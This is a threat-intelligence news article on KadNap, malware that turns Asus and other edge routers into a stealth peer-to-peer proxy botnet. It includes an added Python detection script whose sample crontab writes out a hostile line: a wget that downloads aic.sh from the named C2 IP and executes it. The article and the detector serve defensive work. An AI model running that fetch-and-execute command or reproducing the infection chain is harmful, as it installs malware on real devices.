KadNap Malware Infects 14,000+ Devices, Forms Stealth Proxy Botnet Targeting Asus Routers

KadNap Malware Compromises Over 14,000 Edge Devices, Forming a Stealth Proxy Botnet

Cybersecurity experts have identified a new malware strain named KadNap, which primarily targets Asus routers, enlisting them into a botnet designed to proxy malicious traffic. First detected in August 2025, KadNap has since infected over 14,000 devices, with more than 60% of these cases occurring in the United States. Other affected regions include Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain.

KadNap employs a customized version of the Kademlia Distributed Hash Table (DHT) protocol. This technique conceals the IP addresses of its infrastructure within a peer-to-peer network, effectively evading traditional network monitoring methods. Compromised devices utilize the DHT protocol to locate and connect with command-and-control (C2) servers, enhancing the botnet’s resilience against detection and disruption efforts.

Once a device is compromised, it becomes part of a proxy service known as Doppelgänger (doppelganger[.]shop), which is believed to be a rebranded version of Faceless, another proxy service linked to TheMoon malware. Doppelgänger advertises residential proxies in over 50 countries, claiming to offer 100% anonymity. The service reportedly launched between May and June 2025.

Although Asus routers are the primary targets, KadNap’s operators have also deployed the malware against a variety of edge networking devices. The infection process begins with a shell script named aic.sh, downloaded from a C2 server at IP address 212.104.141[.]140. This script initiates the process of integrating the victim’s device into the peer-to-peer network. It creates a cron job that retrieves the shell script from the server every hour at the 55-minute mark, renames it to .asusrouter, and executes it.

To establish persistence, the script downloads a malicious ELF file, renames it to kad, and runs it, leading to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors.

KadNap also connects to a Network Time Protocol (NTP) server to fetch the current time and stores it along with the device’s uptime. This information is used to create a hash that helps locate other peers in the decentralized network to receive commands or download additional files.

Additional files, such as fwr.sh and /tmp/.sose, are used to close port 22—the standard TCP port for Secure Shell (SSH)—on the infected device and extract a list of C2 IP address:port combinations to connect to.
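The artifacts named above (the hourly cron entry, the aic.sh loader fetched from the C2 host, the .asusrouter and kad files, fwr.sh and /tmp/.sose) can be checked for on a collected crontab and process list. The following is an added defender-side example, not code from the article or from Black Lotus Labs; the sample crontab and process list are constructed, and the exact wget form of the real cron command is an assumption, since the article only describes its schedule and effect.

```python
"""Indicator checks for the KadNap infection chain described in the article (constructed example)."""
import re
from typing import Iterable, List

# Indicators taken from the article: the C2 host that served aic.sh, the loader
# script names, the /tmp/.sose file (matched by basename) and the kad binary.
KADNAP_C2_IP = "212.104.141.140"
KADNAP_FILE_NAMES = ("aic.sh", ".asusrouter", "fwr.sh", ".sose")
KADNAP_BINARY = "kad"

# Five crontab schedule fields followed by the command.
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")

# Constructed sample inputs, not captured from a real device.
SAMPLE_CRONTAB = [
    "# constructed sample crontab",
    "0 3 * * * /sbin/logrotate",
    "55 * * * * wget -q -O /tmp/.asusrouter http://212.104.141.140/aic.sh; sh /tmp/.asusrouter",
]
SAMPLE_PROCESSES = ["init", "httpd", "/tmp/kad", "dropbear"]


def scan_cron_lines(lines: Iterable[str]) -> List[str]:
    """Return one 'line :: reasons' string per crontab entry matching a KadNap indicator."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        minute, hour, _day, _month, _dow, cmd = m.groups()
        reasons = []
        if KADNAP_C2_IP in cmd:
            reasons.append("contacts KadNap C2 " + KADNAP_C2_IP)
        reasons += ["references " + n for n in KADNAP_FILE_NAMES if n in cmd]
        # The loader schedule from the article: every hour at minute 55, fetching a script.
        if minute == "55" and hour == "*" and re.search(r"\b(wget|curl)\b", cmd):
            reasons.append("hourly minute-55 download matches KadNap loader schedule")
        if reasons:
            hits.append(line + " :: " + "; ".join(reasons))
    return hits


def scan_process_names(names: Iterable[str]) -> List[str]:
    """Return process entries whose basename is the kad dropper or one of its scripts."""
    suspects = {KADNAP_BINARY, *KADNAP_FILE_NAMES}
    return [n for n in names if n.rsplit("/", 1)[-1] in suspects]


if __name__ == "__main__":
    print("\n".join(scan_cron_lines(SAMPLE_CRONTAB) + scan_process_names(SAMPLE_PROCESSES)))
```

On a real device the inputs would be the output of `crontab -l` (or the cron spool files) and the process list; a minute-55 hourly download alone is only a schedule match and should be confirmed against the C2 address or file names.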

The innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, as it blends into legitimate peer-to-peer traffic. Further analysis indicates that not all compromised devices communicate with every C2 server, suggesting that the infrastructure is categorized based on device types and models.

The Black Lotus Labs team noted that Doppelgänger's bots are being exploited by threat actors in the wild. They also noted that because these Asus and other devices are sometimes co-infected with other malware, attributing specific malicious activity to a particular source is challenging.

Users of small office/home office (SOHO) routers are advised to keep their devices updated, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and no longer supported.

The KadNap botnet stands out among others that support anonymous proxies because it uses a peer-to-peer network for decentralized control. The operators' intention is clear: to evade detection and make the botnet difficult for defenders to counter.